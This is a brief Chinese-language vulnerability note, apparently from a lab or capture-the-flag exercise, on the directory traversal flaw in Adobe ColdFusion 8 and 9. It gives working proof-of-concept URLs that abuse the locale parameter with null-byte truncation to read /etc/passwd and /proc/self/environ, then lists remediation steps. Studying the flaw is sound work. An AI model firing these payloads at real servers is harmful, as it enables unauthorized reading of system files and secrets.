产品简介
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
漏洞概述
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
影响范围
Adobe ColdFusion 8、9
利用流程
poc
http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
获取flag
http://123.58.236.76:54623/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../proc/self/environ%00en
修复方案
配置文件:在配置文件中限制访问的文件目录,比如 PHP 中 php.ini 配置 open_basedir
特殊字符过滤:检查用户输入,过滤或转义含有“…/”、“…\”、“%00”,“…”,“./”,“#”等跳转目录或字符终止符、截断字符的输入
合法性判断:严格过滤用户输入字符的合法性,比如文件类型、文件地址、文件内容等
白名单:白名单限定访问文件的路径、名称及后缀名